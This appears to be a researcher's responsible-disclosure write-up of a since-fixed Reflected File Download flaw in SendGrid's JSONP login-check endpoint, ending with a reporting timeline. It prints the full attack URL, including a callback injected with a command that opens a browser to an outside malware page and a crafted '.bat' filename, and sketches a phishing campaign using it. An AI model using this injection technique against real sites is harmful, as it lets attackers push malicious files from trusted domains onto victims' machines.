For those who don’t know who SendGrid is…
SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.
They send over 19 billion emails per month.
When visiting their site I noticed a XHR request on my Google Inspector that caught my attention:
https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565
&_=1439389801826
Which returned the following JSON information:
/**/jQuery171016384647646918893_1439389801565({“status”:”success”,”logged_in”
:false});
I noticed that the callback was called on the URL so I decided to inject my RFD vector:
https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||
Reflecting:
/**/||start chrome websegura.net/malware.htm||({“status”:”success”,”logged_in”:false});
Now that I could reflect my payload and removed the variables that don’t do anything on my proof-of-concept and try to manipulate the filename without giving a HTTP error:
https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||
For Internet Explorer 8 and 9 you didn’t need anything else.
If you run this last URL it would automatically try to download freecoupons.bat file from sendgrid.com servers.
On other modern browsers you needed the HTML5 download attribute.
The download would start just by clicking the image.
A malicious user could:
- Launch a malicious campaign with the specially crafted page providing SendGrid.com coupon codes
- Victim downloads the file thinking that is from a trusted domain [SendGrid.com]
- Malicious user gains control over victims machine
SendGrid were always on top of the issue [cool guys] and they were nice enough to send me a awesome t-shirt 🙂
Timeline:
12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that was fixing the issue
29-09-2015 Asked for a update
27-10-2015 SendGrid reported that the issue is fixed